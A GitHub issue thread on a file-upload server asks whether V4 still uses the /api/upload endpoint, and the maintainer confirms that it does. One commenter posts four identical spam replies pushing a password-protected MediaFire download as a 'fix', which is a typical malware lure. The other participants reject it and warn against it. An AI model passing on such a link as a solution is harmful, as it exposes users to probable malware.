### ISSUE TITLE
Bug: V4 API URL?

### ISSUE THREAD

**Issue by sahara101** [dicedtomatoreal/typex#598]
### What happened?

A bug happened!

### Version

other (provide version in additional info)

### What browser(s) are you seeing the problem on?

Safari

### Zipline Logs

```shell
Hello, V3 had /api/upload so I could upload files with ishare. Seems this URL does not exist in V4. Was it changed/removed?

Thanks!
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sahara101** [comment]
Seems I got it working even with 404 message, I just had to recreate my config. 
PS: I won't just download random stuff from mediafire :)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by diced** [comment]
> Seems I got it working even with 404 message, I just had to recreate my config. 

v3 and v4 share the same upload URL, /api/upload, they also use the same multipart/form-data field name, but the only change is the response.

> PS: I won't just download random stuff from mediafire :)

there seems to be some users spamming stuff like that, I will be taking care of it if it pops up again, and to anyone else who sees this do not download anything sent from an external source (it's just a good practice)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
